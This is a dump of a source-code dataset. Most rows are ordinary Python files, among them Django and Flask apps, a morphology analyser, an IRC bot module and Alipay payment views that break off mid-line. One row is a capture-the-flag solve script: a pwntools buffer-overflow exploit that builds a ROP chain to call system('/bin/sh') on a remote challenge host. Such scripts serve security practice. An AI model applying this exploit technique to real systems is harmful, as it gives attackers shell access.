seq_id
stringlengths
7
11
text
stringlengths
156
1.7M
repo_name
stringlengths
7
125
sub_path
stringlengths
4
132
file_name
stringlengths
4
77
file_ext
stringclasses
6 values
file_size_in_byte
int64
156
1.7M
program_lang
stringclasses
1 value
lang
stringclasses
38 values
doc_type
stringclasses
1 value
stars
int64
0
24.2k
dataset
stringclasses
1 value
pt
stringclasses
1 value
20494000483
import random class CaraCoroa: def __init__(self): self.lado = 'Cara' def lancar(self): if random.randint(0, 1) % 2 == 0: self.lado = 'Cara'.upper() return self.lado else: self.lado = 'Coroa'.upper() return self.lado class Dado: def __init__(self): self.lado = 1 def lancar(self): return random.randint(1, 6) if __name__ == '__main__': moeda = CaraCoroa() dado = Dado() op = 1 while op: print() op = int(input('0. Sair\n1. Lançar Moeda\n2. Lançar Dado\nOpção: ')) if op == 1: print(moeda.lancar()) elif op == 2: print(dado.lancar()) else: print('Saindo do jogo...')
Adriano1976/Curso-de-Python
Secao04-Introducao-a-POO/Aula097-Classes/Jogo - Cara Coroa e Dados.py
Jogo - Cara Coroa e Dados.py
py
776
python
pt
code
0
github-code
6
25208341216
#/usr/bin/python3 from pwn import * context.arch = 'amd64' PATH = 'src/chall' HOST = '54.179.233.189' PORT = 8001 GDBSOURCE = ['~/peda/peda.py', '~/pwndbg/gdbinit.py'] LIBC_DBG = { '16.04' : ['~/debug/ubuntu-16.04/dbg64/', '~/debug/ubuntu-16.04/dbg64/libc-2.23.so'], '18.04' : ['~/debug/ubuntu-18.04/dbg64/', '~/debug/ubuntu-18.04/dbg64/libc-2.27.so'], '20.04' : ['~/debug/ubuntu-20.04/dbg64/', '~/debug/ubuntu-20.04/dbg64/libc-2.31.so'], '20.10' : ['~/debug/ubuntu-20.10/dbg64/', '~/debug/ubuntu-20.10/dbg64/libc-2.32.so'], } GDBSCRIPT = ''' b *main+246 set follow-fork-mode parent ''' def debug(gdbscript, gdbsrc = 0, libc = None): if type(r) == process: scripts = [ f'source ~/debug/loadsym.py', f'source ~/gdb_sigwait/src/sighandler.gdb', f'source {GDBSOURCE[gdbsrc]}', ] if libc != None: scripts += [ f'set debug-file-directory {LIBC_DBG[libc][0]}', f'loadsym {LIBC_DBG[libc][1]}' ] gdb.attach(r, '\n'.join(scripts) + gdbscript) def exploit(r): pop_rdi_ret = 0x0000000000401383 payload = b'A' * 0x48 payload += p64(0xdeadbeef) * 2 payload += p64(pop_rdi_ret) payload += p64(elf.bss(0x100)) payload += p64(pop_rdi_ret+1) payload += p64(elf.sym.gets) payload += p64(pop_rdi_ret) payload += p64(elf.bss(0x100)) payload += p64(pop_rdi_ret+1) payload += p64(elf.sym.system) # debug(GDBSCRIPT, gdbsrc = 0, libc = None) r.sendlineafter(b"> ", payload) pause() r.sendline(b"/bin/sh") r.interactive() if __name__ == '__main__': elf = ELF(PATH, checksec = True) # libc = ELF(elf.libc.path, checksec = False) if args.REMOTE: r = remote(HOST, PORT) else: r = elf.process(aslr = 0, env = {}) exploit(r)
bl33dz/ForestyCTF
Binary Exploitation/bof/solve.py
solve.py
py
1,854
python
en
code
1
github-code
6
20181255699
# -*- coding: utf-8 -*- """ Created on Wed Apr 5 12:37:51 2017 @author: vital """ import pickle import networkx as nx import codecs import re from morph import dictionaries as dic from morph import lemmas_dict as lem from config import basedir from app import models, db G = pickle.loads(models.Graph.query.filter_by(lang='oldturkic').first().graph) def get_lem(word): result = {} if word in lem.lemmas_dict: result[word] = lem.lemmas_dict[word] else: for lemma in lem.lemmas_dict: if lemma == word[:len(lemma)]: if lem.lemmas_dict[lemma] not in dic.non_inflected: result[lemma] = lem.lemmas_dict[lemma] return result def last_possible_aff(word): result = [] for n in G.nodes(): for (aff, tag) in G.node[n]: if aff == word[-len(aff):]: result.append([((aff, tag), word[:-len(aff)])]) return result def get_next_aff(affix, chain): result = [] for node in G.nodes(): if affix in G.node[node]: for next_node in G.successors(node): for next_aff in G.node[next_node]: if next_aff[0] == chain[-len(next_aff[0]):]: next_chain = chain[:-len(next_aff[0])] result.append((next_aff, next_chain)) return result def one_step(lst): last_aff = lst[len(lst)-1] next_aff = get_next_aff(last_aff[0], last_aff[1]) result = [] for aff in next_aff: next_lst = lst.copy() next_lst.append(aff) result.append(next_lst) return result def check_for_lemma(list_of_possible_pars): lst = list_of_possible_pars if lst[len(lst)-1][1] in lem.lemmas_dict: return lst def check_list_for_pars(lst): count = [] for l in lst: step = one_step(l) if step == []: z=False count.append(z) else: z=True count.append(z) if True in count: return True else: return False def predict_pos(first_aff): result = [] for node in G.nodes(): if first_aff in G.node[node]: for p in dic.pos: if p in G.successors(node): result.append(p) res = '/'.join(result) return res def reverse_pars(pars, word): result = [] possible_lemmas = get_lem(word) lemma_aff = pars.pop() first_aff = lemma_aff[0] if lemma_aff[1] in possible_lemmas: lemma = (lemma_aff[1], possible_lemmas[lemma_aff[1]]) else: lemma = (lemma_aff[1], predict_pos(first_aff)) for morph in pars: result.append(morph[0]) result.append(first_aff) result.append(lemma) result.reverse() return result def filter_pars(parses): result = [] order = [5,4,6,3,7,8,9,10,11,12,13,14,15,16,17,18] for l in order: for p in parses: if len(p[0][0]) == l: result.append(p) return result def parsing(word): start = last_possible_aff(word) while check_list_for_pars(start) == True: result = [] for lst in start: if len(one_step(lst)) == 0: result.append(lst) continue else: result.extend(one_step(lst)) start = result return start def pars_analyse(w): possible_lemmas = get_lem(w) result = [] if possible_lemmas != {}: if w in possible_lemmas: return [[(w, possible_lemmas[w])]] else: for l in possible_lemmas: chain = w[len(l):] possible_parses = parsing(chain) parses = [pars for pars in possible_parses if pars[len(pars)-1][1] == ''] for p in parses: tmp = [] if possible_lemmas[l] in predict_pos(p[len(p)-1][0]): for morph in p: tmp.append(morph[0]) tmp.append((l, possible_lemmas[l])) tmp.reverse() result.append(tmp) if result == []: possible_parses = parsing(w) for pars in possible_parses: tmp = [] lemma_aff = pars.pop() first_aff = lemma_aff[0] lemma = (lemma_aff[1], predict_pos(first_aff)) if pars == []: tmp.append(lemma) tmp.append(first_aff) result.append(tmp) else: for morph in pars: tmp.append(morph[0]) tmp.append(first_aff) tmp.append(lemma) tmp.reverse() result.append(tmp) result = filter_pars(result) result = [e for i,e in enumerate(result) if e not in result[:i]] return result def tag_interpretation(pars, lang): result = "" for morpheme in pars: tag = morpheme[1] if ',' in tag: tmp = tag.split(',') for t in tmp: if '/' in t: for tt in t.split('/'): result += dic.interpretation[tt][lang] + ' / ' result += '+ ' else: result += dic.interpretation[t][lang] + ' + ' else: if 'S' and 'SPRON' and 'ADJ' in tag.split('/'): tag = 'NAME' result += dic.interpretation[tag][lang] + ' + ' elif '/' in tag: for t in tag.spilt('/'): result += dic.interpretation[tag][lang] + ' / ' result += '+ ' else: result += dic.interpretation[tag][lang] + ' + ' return result[0:len(result)-3]
vetka925/oldturkicmorph-web
morph/morph_analysis.py
morph_analysis.py
py
5,750
python
en
code
0
github-code
6
14839168624
from django.contrib.auth import get_user_model from django.shortcuts import get_object_or_404, render, redirect from django.contrib.auth.decorators import login_required from django.core.paginator import Paginator from django.conf import settings from .forms import PostForm, CommentForm from .models import Post, Group, User, Follow User = get_user_model() def paginator(request, object_list, per_page): paginate = Paginator(object_list, per_page) page_number = request.GET.get('page') page_obj = paginate.get_page(page_number) return page_obj def index(request): posts = Post.objects.select_related('author', 'group') page_obj = paginator(request, posts, settings.SORT_POSTS) template = 'posts/index.html' context = { 'posts': posts, 'page_obj': page_obj, } return render(request, template, context) def group_posts(request, slug): group = get_object_or_404(Group, slug=slug) posts = group.groups.select_related('author') page_obj = paginator(request, posts, settings.SORT_POSTS) template = 'posts/group_list.html' context = { 'group': group, 'posts': posts, 'page_obj': page_obj, } return render(request, template, context) def profile(request, username): author = get_object_or_404(User, username=username) posts = author.posts.select_related('group') count = posts.count() following = request.user.is_authenticated and Follow.objects.filter( user=request.user, author=author ) page_obj = paginator(request, posts, settings.SORT_POSTS) context = { 'page_obj': page_obj, 'count': count, 'author': author, 'following': following, } template = 'posts/profile.html' return render(request, template, context) def post_detail(request, post_id): post = get_object_or_404(Post, pk=post_id) post_title = post.text[:30] form = CommentForm(request.POST or None) author = post.author author_posts = author.posts.all().count() comments = post.comments.select_related('author') context = { 'post': post, 'post_title': post_title, 'author': author, 'author_posts': author_posts, 'form': form, 'comments': comments, } template = 'posts/post_detail.html' return render(request, template, context) @login_required def post_create(request): form = PostForm(request.POST or None, files=request.FILES or None) if form.is_valid(): post = form.save(commit=False) post.author = request.user post.save() return redirect('posts:profile', request.user) template = 'posts/create_post.html' context = {'form': form} return render(request, template, context) @login_required def post_edit(request, post_id): post = get_object_or_404(Post, pk=post_id) form = PostForm( request.POST or None, files=request.FILES or None, instance=post ) if post.author != request.user: return redirect('posts:post_detail', post_id) if form.is_valid(): edited_post = form.save() edited_post.save() return redirect('posts:post_detail', post_id) context = { 'form': form, 'is_edit': True, 'post': post, } template = 'posts/create_post.html' return render(request, template, context) @login_required def add_comment(request, post_id): post = get_object_or_404(Post, id=post_id) form = CommentForm(request.POST or None) if form.is_valid(): comment = form.save(commit=False) comment.author = request.user comment.post = post comment.save() return redirect('posts:post_detail', post_id=post_id) @login_required def follow_index(request): post_list = Post.objects.filter(author__following__user=request.user) page_obj = paginator(request, post_list, settings.SORT_POSTS) context = { 'page_obj': page_obj, } return render(request, 'posts/follow.html', context) @login_required def profile_follow(request, username): author = get_object_or_404(User, username=username) if author != request.user: Follow.objects.get_or_create(user=request.user, author=author) return redirect('posts:profile', username) @login_required def profile_unfollow(request, username): author = get_object_or_404(User, username=username) Follow.objects.filter(user=request.user, author=author).delete() return redirect('posts:profile', username)
Medbrat4669/yatube_project
yatube/posts/views.py
views.py
py
4,552
python
en
code
0
github-code
6
36802074369
#! /usr/bin/python3 import sqlite3 import pandas as pd pd.set_option('display.max_columns', 500) path = '/home/mayijun/CITI2017/' # Calculate station days conn = sqlite3.connect(path + 'CITI2017.sqlite3') sql = """SELECT DISTINCT startstationid AS stationid,startdate AS date FROM trip WHERE startweekday NOT IN ('Saturday','Sunday')""" start = pd.read_sql(sql, conn) sql = """SELECT DISTINCT endstationid AS stationid,enddate AS date FROM trip WHERE endweekday NOT IN ('Saturday','Sunday')""" end = pd.read_sql(sql, conn) wkday = pd.concat([start, end]) wkday = wkday.drop_duplicates() wkday = wkday.groupby(['stationid'], as_index=False)['date'].count() wkday.columns = ['stationid', 'weekdays'] sql = """SELECT DISTINCT startstationid AS stationid,startdate AS date FROM trip WHERE startweekday IN ('Saturday','Sunday')""" start = pd.read_sql(sql, conn) sql = """SELECT DISTINCT endstationid AS stationid,enddate AS date FROM trip WHERE endweekday IN ('Saturday','Sunday')""" end = pd.read_sql(sql, conn) wkend = pd.concat([start, end]) wkend = wkend.drop_duplicates() wkend = wkend.groupby(['stationid'], as_index=False)['date'].count() wkend.columns = ['stationid', 'weekends'] df = pd.merge(wkday, wkend, how='outer', on='stationid') df.to_csv(path + 'stationdays.csv', index=False, na_rep=0) conn.close() # Merge station list and station days conn = sqlite3.connect(path + 'CITI2017.sqlite3') station = pd.read_csv(path + 'station.csv') wkd = pd.read_csv(path + 'stationdays.csv') station=station[['stationid','stationname','stationlat','stationlong']] df = pd.merge(station, wkd, how='outer', on='stationid').sort_values('stationid') df.to_sql('station', conn, if_exists='replace', index=False) conn.close()
NYCPlanning/td-citibike
2017/stationdays.py
stationdays.py
py
1,726
python
en
code
1
github-code
6
29969194613
from src import EventManager, ModuleManager, utils TAGS = { utils.irc.MessageTag(None, "inspircd.org/bot"), utils.irc.MessageTag(None, "draft/bot") } class Module(ModuleManager.BaseModule): @utils.hook("received.376") @utils.hook("received.422") def botmode(self, event): if "BOT" in event["server"].isupport: botmode = event["server"].isupport["BOT"] event["server"].send_raw("MODE %s +%s" % (event["server"].nickname, botmode)) @utils.hook("received.message.private") @utils.hook("received.message.channel") @utils.kwarg("priority", EventManager.PRIORITY_HIGH) def message(self, event): for tag in TAGS: if tag.present(event["tags"]): event.eat()
xfnw/bitbot
modules/ircv3_botignore.py
ircv3_botignore.py
py
756
python
en
code
null
github-code
6
12960752319
import warnings warnings.filterwarnings('ignore') from popsycle import synthetic import numpy as np import matplotlib.pyplot as plt from astropy.table import Table import h5py def test_h5_output(ebf_file, reference_h5_file, extra_col= False): """" Parameters ---------- ebf_file : str Name of the ebf file used to generate the reference h5 file reference_h5_file : str Name of the file to compare new output to (should be run with seed=42 on the ebf_file) extra_col : boolean, defaults to False Tells the code whether or not the new h5 file will have additional columns (ie does the new version of popsycle give more information than before """ #create the new h5 file by running popsycle synthetic.perform_pop_syn(ebf_file = ebf_file, output_root = 'test', iso_dir = '/u/casey/scratch/work/microlens/popsycle_test/isochrones/', bin_edges_number = None, overwrite = True, seed=42); #read in the data from the reference h5 file hfr = h5py.File(reference_h5_file, 'r') ref_dset = np.concatenate((hfr['l0b0'], hfr['l0b1'], hfr['l1b0'], hfr['l1b1']), axis=1) hfr.close() #read in the data from the test h5 file created by popsycle hft = h5py.File('test.h5', 'r') test_dset = np.concatenate((hft['l0b0'], hft['l0b1'], hft['l1b0'], hft['l1b1']), axis=1) hft.close() #see if we have the right number of columns if test_dset.shape[0] != ref_dset.shape[0]: if not extra_col: print("the h5 files are not the same size. Run again with extra_col=True if you have added columns") #test to see whether the files are the same matched_col=0 #initialize matched_col counter for i in range(0, ref_dset.shape[0]): test_col = test_dset[i,:] ref_col = ref_dset[i, :] if test_col.all() == ref_col.all(): matched_col = matched_col+1 #check to see if disagreements are because of nans else: bad_idxs = np.where(ref_col != test_col) ref_nan_idx = np.where(ref_col == np.nan) test_nan_idx = np.where(test_col == np.nan) if test_nan_idx.all() == ref_nan_idx.all() and bad_idxs.all() == ref_nan_idx.all(): matched_col = matched_col+1 else: matched_col= matched_col print('Test failed in column', i) if matched_col == ref_dset.shape[0]: print("The new test h5 file matched the reference file!") else: print("The new test h5 file does not match the reference file") return synthetic.calc_events(hdf5_file = 'test.h5', output_root2 = 'test', radius_cut = 2, obs_time = 1000, n_obs = 11, theta_frac = 2, blend_rad = 0.65, overwrite = True, n_proc = 1) synthetic.refine_events(input_root = 'test', filter_name = 'I', photometric_system = 'ubv', red_law = 'Damineli16', overwrite = True, output_file = 'default') hfr = h5py.File('trial_1.h5', 'r') print((list(hfr.keys()))) dsetr = hfr['l0b0'] print(dsetr) hfr.close() hft = h5py.File('test.h5', 'r+') print(list(hft.keys())) dsett = hft['l0b0'] print(dsett) dsett.resize((27, 176660)) print(dsett) print('test==trial', dsetr == dsett) hft.close() tabr = Table.read('trial_1_refined_events_i_Damineli16.fits') tabt = Table.read('test_refined_events_i_Damineli16.fits') print('The col names of the trial 1 fits are:', tabr.colnames) print('The col names of the test fits are:', tabt.colnames) tabt.remove_columns(['teff_S', 'grav_S', 'lum_S', 'teff_L', 'grav_L', 'lum_L']) print('Check if tables differ:', tabr == tabt)
jluastro/PopSyCLE
popsycle/tests/output_test_synthetic.py
output_test_synthetic.py
py
4,102
python
en
code
13
github-code
6
25993094849
from datetime import datetime from flask_wtf import FlaskForm from wtforms import StringField, SubmitField, TextAreaField, SelectField, FloatField from wtforms.validators import DataRequired, Length, Regexp class NewOrderForm(FlaskForm): description = TextAreaField("Опис: ", validators=[DataRequired(), Length(max=1000)]) client = StringField('Клієнт', id='client_autocomplete', validators=[DataRequired(), Length(max=200)]) created_at = StringField("Дата створення", validators=[DataRequired(), Regexp( r'^(0[1-9]|[12][0-9]|3[01])[\.](0[1-9]|1[012])[\.]((19|20)\d\d|\d\d)$')], default=datetime.now().strftime("%d.%m.%Y")) serial = StringField("Серійний номер", id='serial_autocomplete', validators=[Length(max=200)]) price = FloatField("Ціна", validators=[DataRequired()]) staff = SelectField("Виконавець") type = SelectField("Тип замовлення") submit = SubmitField("Зберегти") def __init__(self, order=None, staff_choices=None, type_choices=None, *args, **kwargs): super().__init__(*args, **kwargs) if order: self.description.data = order.description self.client.data = order.client self.created_at.data = order.created_at.strftime("%d.%m.%Y") self.serial.data = order.device.serial self.price.data = order.price self.staff.data = order.staff.name self.type.data = order.type.name if staff_choices: self.staff.choices = staff_choices if type_choices: self.type.choices = type_choices class NewClientForm(FlaskForm): name = StringField("Ім'я фізичної або юридичної особи", validators=[DataRequired(), Length(max=200)]) # validators = [Regexp(r'^(\+\d{1,2}\s?)?((\(?\d{3}\)?)[\s]?\d{3}[\s]?\d{4}|(\(?\d{3,4}\)?)[\s]?\d{3}[\s]?\d{3})$')] phone = StringField("Номер телефону", validators=[DataRequired(), Length(max=80)]) address = StringField("Адреса", validators=[Length(max=200)]) notes = TextAreaField("Примітки", validators=[Length(max=1000)]) submit = SubmitField("Зберегти") def __init__(self, client=None, *args, **kwargs): super().__init__(*args, **kwargs) if client: self.name.data = client.name self.phone.data = client.phone self.address.data = client.address self.notes.data = client.notes class NewDeviceForm(FlaskForm): name = StringField("Назва") serial = StringField("Серійний номер", validators=[DataRequired()]) submit = SubmitField("Зберегти") def __init__(self, device=None, *args, **kwargs): super().__init__(*args, **kwargs) if device: self.name.data = device.name self.serial.data = device.serial class NewStaffForm(FlaskForm): name = StringField("Ім'я") submit = SubmitField("Зберегти") class DeleteConfirmForm(FlaskForm): delete = SubmitField("Так, видалити") class NavigationForm(FlaskForm): search_field = StringField("Введіть пошуковий запит") status_field = SelectField('Статус') type_field = SelectField('Тип') sort_by_field = SelectField('Сортувати за', choices=[('new_first', 'Датою (нові спочатку)'), ('old_first', 'Датою (старі спочатку)'), ('client', 'Клієнтом'), ('status', 'Статусом')]) def __init__(self, status_choices=None, type_choices=None, *args, **kwargs): super().__init__(*args, **kwargs) if status_choices: self.status_field.choices = status_choices if type_choices: self.type_field.choices = type_choices
1Lorde/orders-tracker
orders_tracker/forms.py
forms.py
py
4,563
python
en
code
0
github-code
6
16760366561
from django.shortcuts import render,redirect,get_object_or_404 # CSRF from django.views.decorators.csrf import csrf_exempt from django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode from django.utils.encoding import force_bytes from django.core.mail import EmailMessage from django.utils.encoding import force_bytes, force_text from django.core.mail import BadHeaderError, send_mail from django.http import HttpResponse, HttpResponseRedirect from django.contrib.sites.shortcuts import get_current_site from django.template.loader import render_to_string from django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode from django.utils.encoding import force_bytes from django.core.mail import EmailMessage from django.utils.encoding import force_bytes, force_text from django.contrib import messages import pdb def home(request): return render(request, 'index.html') # def contact(request): # return render(request, 'contact.html') @csrf_exempt def sendemail(request): username = request.POST.get('username') subject = "돌직구 사용자"+ username+ "님이 보내신 문의 메일입니다." message = request.POST.get('message') useremail = request.POST.get("useremail") if subject and message and useremail: try: send_mail(subject, message, useremail, ["[email protected]"]) except BadHeaderError: return HttpResponse('Invalid header found.') return redirect('home') else: return HttpResponse("정확하게 입력해주세요.") @csrf_exempt def contact(request): if request.method == "POST": username = request.POST["username"] subject = "돌직구 사용자"+ username+ "님이 보내신 문의 메일입니다." message = request.POST["message"] useremail = request.POST["useremail"] emailContent = render_to_string('email.html', { "subject": subject, "useremail": useremail, "message":message, }) emailAddress = "[email protected]" emailObject = EmailMessage(subject, emailContent, to=[emailAddress]) emailObject.content_subtype = "html" result = emailObject.send() if result == 1: messages.info(request, "성공적으로 문의가 돌직구에 전달되었습니다.") else: messgaes.info(request, "문의에 실패하였습니다.") return redirect('contact') else: return render(request, 'contact.html')
suna-ji/RockJiggu
RockJiggu/views.py
views.py
py
2,535
python
en
code
0
github-code
6
13956703300
from django.db.models import Field from . import forms from . import validators from .ipv6cidr import clean_ipv6_cidr from django.utils.translation import gettext_lazy as _, ngettext_lazy class GenericIPNetworkField(Field): """ Support CIDR input ipv4 0.0.0.0/0 ipv6 ::::/0 """ empty_strings_allowed = False description = _("GenericIPNetworkField") default_error_messages = {} def __init__(self, verbose_name=None, name=None, protocol='both', *args, **kwargs): self.protocol = protocol self.default_validators, invalid_error_message = \ validators.ip_network_validators(protocol) self.default_error_messages['invalid'] = invalid_error_message kwargs['max_length'] = 43 # ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128 super().__init__(verbose_name, name, *args, **kwargs) def check(self, **kwargs): errors = super().check(**kwargs) errors.extend(self._check_blank_and_null_values(**kwargs)) return errors def _check_blank_and_null_values(self, **kwargs): if not getattr(self, 'null', False) and getattr(self, 'blank', False): return [ checks.Error( 'GenericIPNetworkField cannot have blank=True if null=False, ' 'as blank values are stored as nulls.', obj=self, id='fields.E150', ) ] return [] def deconstruct(self): name, path, args, kwargs = super().deconstruct() if self.protocol != "both": kwargs['protocol'] = self.protocol if kwargs.get("max_length") == 43: del kwargs['max_length'] return name, path, args, kwargs def get_internal_type(self): return "GenericIPNetworkField" def to_python(self, value): import ipdb;ipdb.set_trace() if value is None: return None if not isinstance(value, str): value = str(value) value = value.strip() if ':' in value: return clean_ipv6_network(value, self.unpack_ipv4, self.error_messages['invalid']) return value def get_db_prep_value(self, value, connection, prepared=False): if not prepared: value = self.get_prep_value(value) return connection.ops.adapt_ipaddressfield_value(value) def get_prep_value(self, value): value = super().get_prep_value(value) if value is None: return None if value and ':' in value: try: return clean_ipv6_cidr(value) except exceptions.ValidationError: pass return str(value) def formfield(self, **kwargs): defaults = { 'protocol': self.protocol, 'form_class': forms.GenericIPNetworkField, } defaults.update(kwargs) return super().formfield(**defaults)
MilkBotttle/BFP
fields/cidr.py
cidr.py
py
2,978
python
en
code
0
github-code
6
31228319050
#coding=utf-8 from thuproxy.alipay_api import * from thuproxy.proxy_account_views import * import datetime import uuid import urllib.request from django.views.decorators.csrf import csrf_exempt from django.contrib.auth.decorators import login_required from django.http import HttpResponse, HttpResponseRedirect from django.shortcuts import render_to_response, RequestContext # 优惠比率 RATE = 0.6 # 根据支付类型选择策略 @login_required(login_url="/login/") def alipay_apply(request, pay_type): is_user_login = request.user.is_authenticated() user = request.user proxy_account = ProxyAccount.objects.get(user=request.user) pay_list = Pay.objects.filter(user_id=user.id, status='U') if len(pay_list) != 0: request.session["error"] = "need_repay" return HttpResponseRedirect('/homepage') # 判断支付类型 if pay_type == 'first': if proxy_account.expired_date is not None: request.session["error"] = "first_pay" return HttpResponseRedirect('/homepage') return render_to_response('alipay_create_order_first.html', locals(), context_instance=RequestContext(request)) elif pay_type == 'upgrade': if proxy_account.type == 50: request.session["error"] = "upgrade" return HttpResponseRedirect('/homepage') if datetime.datetime.now().date() < proxy_account.expired_date: remain_time = proxy_account.expired_date - datetime.datetime.now().date() proxy_account.remain_time = int(remain_time.days) elif datetime.datetime.now().date() >= proxy_account.expired_date: request.session["error"] = "date" return HttpResponseRedirect('/homepage') return render_to_response('alipay_create_order_upgrade.html', locals(), context_instance=RequestContext(request)) elif pay_type == 'downgrade': if proxy_account.type == 1: request.session["error"] = "downgrade" return HttpResponseRedirect('/homepage') remain_time = proxy_account.expired_date - datetime.datetime.now().date() proxy_account.remain_time = int(remain_time.days) return render_to_response('alipay_create_order_downgrade.html', locals(), context_instance=RequestContext(request)) elif pay_type == 'continue': return render_to_response('alipay_create_order_continue.html', locals(), context_instance=RequestContext(request)) else: return HttpResponse('充值请求错误') # 生成订单 @login_required(login_url="/login/") def alipay_create_orders(request): is_user_login = request.user.is_authenticated() user = request.user proxy_account = ProxyAccount.objects.get(user=request.user) m = request.POST['money'] money = float(m) * RATE money = round(money, 2) pay_type = int(request.POST['pay_type']) today = timezone.now() try: # 升级的情况下,需要记录的是账号剩余天数而非需要付费的月数 if pay_type == 3: day = request.POST['day'] pay = Pay(out_trade_no=uuid.uuid1().hex, user=user, total_fee=money, type=int(pay_type), month=int(day), status='U', create_date=today) else: month = request.POST['month'] pay = Pay(out_trade_no=uuid.uuid1().hex, user=user, total_fee=money, type=int(pay_type), month=int(month), status='U', create_date=today) pay.save() params = {'out_trade_no': pay.out_trade_no, 'subject': u'清云加速', 'body': u'流量购买费用', 'total_fee': str(money)} total_fee = pay.total_fee alipay = Alipay(notifyurl="http://scholar.thucloud.com/alipay/callback", returnurl="http://scholar.thucloud.com/alipay/success", showurl="http://scholar.thucloud.com/alipay/success") params.update(alipay.conf) sign = alipay.buildSign(params) return render_to_response('alipay_show_order.html', locals()) except Exception as e: print(e) return HttpResponse('生成订单错误') # 生成需要重新支付的订单 @login_required(login_url="/login/") def alipay_repay_orders(request, pay_no): is_user_login = request.user.is_authenticated() user = request.user proxy_account = ProxyAccount.objects.get(user=request.user) try: pay_list = Pay.objects.filter(out_trade_no=pay_no) if len(pay_list) != 1: request.session["error"] = "repay" return HttpResponseRedirect('/homepage') else: pay = pay_list[0] params = {'out_trade_no': pay.out_trade_no, 'subject': u'清云加速', 'body': u'流量购买费用', 'total_fee': str(pay.total_fee)} total_fee = pay.total_fee alipay = Alipay(notifyurl="http://scholar.thucloud.com/alipay/callback", returnurl="http://scholar.thucloud.com/alipay/success", showurl="http://scholar.thucloud.com/alipay/success") params.update(alipay.conf) sign = alipay.buildSign(params) money = pay.total_fee return render_to_response('alipay_show_order.html', locals()) except Exception as e: print(e) return HttpResponse('显示订单错误') @csrf_exempt def alipay_callback(request): try: print(datetime.datetime.now()) print("call back start") params = request.POST.dict() if not isinstance(params, dict): print('error params not dict') alipay = Alipay() # 判断是否为有效返回 sign = None if 'sign' in params: sign = params['sign'] loc_sign = alipay.buildSign(params) if sign is None or loc_sign != sign: return HttpResponse("fail") print("sign is ok") # 判断交易状态是否有效,以免重复判断交易成功 if params['trade_status'] != 'TRADE_FINISHED' and params['trade_status'] != 'TRADE_SUCCESS': print('trade status error') return HttpResponse("fail") else: print("trade status ok") print("url: ") url = verifyURL['https'] + "&partner=%s&notify_id=%s" % (alipay.conf['partner'], params['notify_id']) print(url) response = urllib.request.urlopen(url) html = response.read() print("aliypay.com return: %s" % html) # 支付宝返回有效信息 if html == b'true': print('result is true') try: out_trade_no = params['out_trade_no'] print('out trade no ', out_trade_no) trade_no = params['trade_no'] print('trade no ', trade_no) total_fee = params['total_fee'] pay = Pay.objects.get(out_trade_no=out_trade_no) # todo: handle other error status if pay is None: return HttpResponse("无此订单,请重新下单") if pay.status == 'S': return HttpResponse("已经成功支付了") print('user', pay.user) proxy_account = ProxyAccount.objects.get(user=pay.user) print('proxy_account', proxy_account) print('pay total fee', pay.total_fee) month = pay.month pay_type = pay.type real_fee = float(total_fee) / RATE print('month', month) print('pay type', pay_type) print('real fee', real_fee) # 初次缴费 if pay_type == 1: account_type = int(real_fee)/int(month) print("accounttype", account_type) if account_type not in {1, 5, 10, 20, 50}: return HttpResponse("accout_type_error") else: print("success:", account_type, " month", month) proxy_account.type = account_type today = datetime.datetime.now() if proxy_account.expired_date is not None: return HttpResponse("not init") else: print("init date") expired_date = today + datetime.timedelta(30*int(month)) if proxy_account.paydate is None: create_pac(proxy_account) print("create_pac done") open_listen_port(proxy_account.port, proxy_account.type) print("open_listen_port done") proxy_account.paydate = today proxy_account.expired_date = expired_date elif pay_type == 2: # 续费 account_type = int(real_fee)/int(month) print("accounttype", account_type) if account_type != proxy_account.type or proxy_account.expired_date is None: return HttpResponse("accout_type_error") else: print("success:", account_type, " month", month) today = datetime.date.today() print("add month") if proxy_account.expired_date < today: # 欠费啦 expired_date = today + datetime.timedelta(30*int(month)) reopen_port(proxy_account.port) else: expired_date = proxy_account.expired_date + datetime.timedelta(30*int(month)) proxy_account.expired_date = expired_date elif pay_type == 3: # 升级 today = datetime.date.today() if proxy_account.expired_date < today: # 欠费啦 return HttpResponse("fail") upgrade_delta = (real_fee/month)*30 upgrade_delta = int(upgrade_delta+0.1) print(upgrade_delta) proxy_account.type += upgrade_delta if proxy_account.type not in {1, 5, 10, 20, 50}: return HttpResponse("accout_type_error") if ACCOUNT_TRAFFIC_LIMIT[int(proxy_account.type)] > proxy_account.traffic: reopen_port(proxy_account.port) # 修改带宽和流量 upgrade_port(proxy_account.port, proxy_account.type) else: pay.status = 'F' pay.save() return HttpResponse("fail") print("sava pay") pay.status = 'S' pay.trade_no = trade_no pay.total_fee = real_fee pay.save() print("sava proxy_account") proxy_account.save() return HttpResponse("success") except Exception as e: print(e) return HttpResponse("fail") except Exception as e: return HttpResponse("fail") print(e) @login_required(login_url="/login/") def alipay_success(request): is_user_login = request.user.is_authenticated() proxy_account = ProxyAccount.objects.get(user=request.user) return render_to_response('alipay_success.html', locals(), context_instance=RequestContext(request)) @login_required(login_url="/login/") def alipay_cancel(request, pay_no): print(pay_no) pay = Pay.objects.filter(out_trade_no=pay_no) if len(pay) != 1: request.session["error"] = "cancel" return HttpResponseRedirect('/homepage') else: pay[0].status = 'C' pay[0].save() return HttpResponseRedirect('/homepage') def alipay_test(request): pay_type = int(request.POST['pay_type']) month = int(request.POST['month']) total_fee = float(request.POST['money']) total_fee *= RATE proxy_account = ProxyAccount.objects.get(user=request.user) real_fee = float(total_fee/RATE) print('realfee', real_fee) if pay_type == 1: account_type = int(real_fee)/int(month) print("accounttype", account_type) if account_type not in {1, 5, 10, 20, 50}: return HttpResponse("accout_type_error") else: print("success:", account_type, " month", month) proxy_account.type = account_type today = datetime.datetime.now() if proxy_account.expired_date is not None: print("add month") return HttpResponse("not init") else: print("init month") expired_date = today + datetime.timedelta(30*int(month)) if proxy_account.paydate is None: print("init paydate") create_pac(proxy_account) print("create_pac done") open_listen_port(proxy_account.port, proxy_account.type) print("open_listen_port done") proxy_account.paydate = today proxy_account.expired_date = expired_date elif pay_type == 2: account_type = int(real_fee)/int(month) print("accounttype", account_type) if account_type != proxy_account.type or proxy_account.expired_date is None: return HttpResponse("accout_type_error") else: print("success:", account_type, " month", month) today = datetime.date.today() print("add month") if proxy_account.expired_date < today: expired_date = today + datetime.timedelta(30*int(month)) else: expired_date = proxy_account.expired_date + datetime.timedelta(30*int(month)) proxy_account.expired_date = expired_date elif pay_type == 3: upgrade_delta = 